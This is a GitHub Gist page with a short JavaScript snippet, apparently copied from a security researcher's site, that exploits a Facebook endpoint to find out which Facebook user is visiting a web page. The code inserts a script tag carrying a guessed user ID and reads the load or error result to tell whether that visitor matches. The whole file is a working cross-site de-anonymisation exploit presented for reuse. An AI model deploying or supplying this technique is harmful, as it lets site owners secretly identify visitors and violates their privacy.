Created
May 17, 2020 02:41
-
-
Save nhudinhtuan/c12b759b69cf24aff568219f047bd81e to your computer and use it in GitHub Desktop.
Verify userid using script tag with exploit FB endpoitn
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * The source code is copied from https://www.tomanthony.co.uk | |
| */ | |
| function runcheck(userid) | |
| { | |
| var scriptblock = document.createElement("script"); | |
| scriptblock.src = "https://www.facebook.com/ajax/pagelet/generic.php/TimelineEntStoryActivityLogPagelet?dpr=2&ajaxpipe=1&ajaxpipe_token=AXjdDM6DZ_aiAeG-&no_script_path=1&data=%7B%22year%22%3A2017%2C%22month%22%3A9%2C%22log_filter%22%3A%22hidden%22%2C%22profile_id%22%3A1059016196%7D&__user=" + userid + "&__a=1&__dyn=7AgNe-4amaxx2u6aJGeFxqeCwKyWzEy4aheC267UqwWhE98nwgU6C4UKK9wPGi2uUG4XzEeUK3uczobrzoeonVUkz8nxm1typ8S2m4pU5LxqrUGcwBx-1-wODBwzg7Gu4pHxx0MxK1Iz8d8vy8yeyES3m6ogUKexeEgy9EhxO2qfyZ1zx69wyQF8uhm3Ch4yEiyocUiVk48a8ky89kdGFUS&__req=fetchstream_8&__be=1&__pc=PHASED%3ADEFAULT&__rev=3832430&__spin_r=3832430&__spin_b=trunk&__spin_t=1524222703&__adt=8&ajaxpipe_fetch_stream=1"; | |
| scriptblock.id = userid; | |
| scriptblock.onload = function() { show_result(userid, false); }; | |
| scriptblock.onerror = function() { show_result(userid, true); }; | |
| document.getElementById('manualblock').appendChild(scriptblock); | |
| } | |
| function show_result(userid, status) | |
| { | |
| if (status) { | |
| // userid is currently viewing your website | |
| } else { | |
| // not detected | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Cf Esaú